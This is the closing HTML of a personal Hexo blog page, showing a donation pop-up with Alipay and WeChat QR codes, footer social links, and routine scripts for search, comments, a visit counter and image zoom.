  <div class="modal-dialog" role="document">
    <div class="modal-content donate">
      <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
      <div class="modal-body">
        <div class="donate-box">
          <div class="donate-head">
            <p>Maybe you could buy me a cup of coffee.</p>
          </div>
          <div class="tab-content">
            <div role="tabpanel" class="tab-pane fade active in" id="alipay">
              <div class="donate-payimg">
                <img src="/images/donate/ipay.png" alt="Scan Qrcode" title="Scan" />
              </div>
              <p class="text-muted mv">Scan this qrcode</p>
              <p class="text-grey">Open alipay app scan this qrcode, buy me a coffee!</p>
            </div>
            <div role="tabpanel" class="tab-pane fade" id="wechatpay">
              <div class="donate-payimg">
                <img src="/images/donate/wechat.png" alt="Scan Qrcode" title="Scan" />
              </div>
              <p class="text-muted mv">Scan this qrcode</p>
              <p class="text-grey">Open wechat app scan this qrcode, buy me a coffee!</p>
            </div>
          </div>
          <div class="donate-footer">
            <ul class="nav nav-tabs nav-justified" role="tablist">
              <li role="presentation" class="active">
                <a href="#alipay" id="alipay-tab" role="tab" data-toggle="tab" aria-controls="alipay" aria-expanded="true"><i class="icon icon-alipay"></i> alipay</a>
              </li>
              <li role="presentation" class="">
                <a href="#wechatpay" role="tab" id="wechatpay-tab" data-toggle="tab" aria-controls="wechatpay" aria-expanded="false"><i class="icon icon-wepay"></i> wechat payment</a>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>



</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/ld1ng" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="https://weibo.com/5580147545/profile?" target="_blank" title="Weibo" data-toggle=tooltip data-placement=top><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="https://twitter.com/Liding10763325" target="_blank" title="Twitter" data-toggle=tooltip data-placement=top><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        &copy; 2020 Ld1ng
        
        <div class="publishby">
        	Theme by <a href="https://github.com/ld1ng" target="_blank"> ld1ng </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'Categories',
            TAGS: 'Tags',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





   
    
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine"></script>
  <script type="text/javascript">
  var GUEST = ['nick', 'mail', 'link'];
  var meta = 'nick,mail,link';
  meta = meta.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#vcomments',
    verify: false,
    notify: false,
    appId: 'axhOjPzscogBppPjn36rtaAv-gzGzoHsz',
    appKey: 'gMB6OHiHJvIxpnVtuoYxyPhk',
    placeholder: 'Just go go',
    avatar: 'wavatar',
    meta: meta,
    pageSize: '10' || 10,
    visitor: false
  });
  </script>

     



  <script src="//cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.3.5/dist/jquery.fancybox.min.js"></script>
  <script>
  //利用 FancyBox 实现点击图片放大
  $(document).ready(function() {
    $('article img').not('[hidden]').not('.panel-body img').each(function() {
      var $image = $(this);
      var imageCaption = $image.attr('alt');
      var $imageWrapLink = $image.parent('a');
      if ($imageWrapLink.length < 1) {
        var src = this.getAttribute('src');
        var idx = src.lastIndexOf('?');
        if (idx != -1) {
          src = src.substring(0, idx);
        }
        $imageWrapLink = $image.wrap('<a href="' + src + '"></a>').parent('a');
      }
      $imageWrapLink.attr('data-fancybox', 'images');
      if (imageCaption) {
        $imageWrapLink.attr('data-caption', imageCaption);
      }
    });
    $().fancybox({
      selector: '[data-fancybox="images"]',
      hash: false,
      loop: false,
    });
  });
  </script>





<!--动态线条背景-->
<script type="text/javascript"
color="220,220,220" opacity='0.7' zIndex="-2" count="150" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
</script>
 <!-- 页面点击礼花效果 -->
<script type="text/javascript" src="/js/firework.js"></script>
</body>
</html>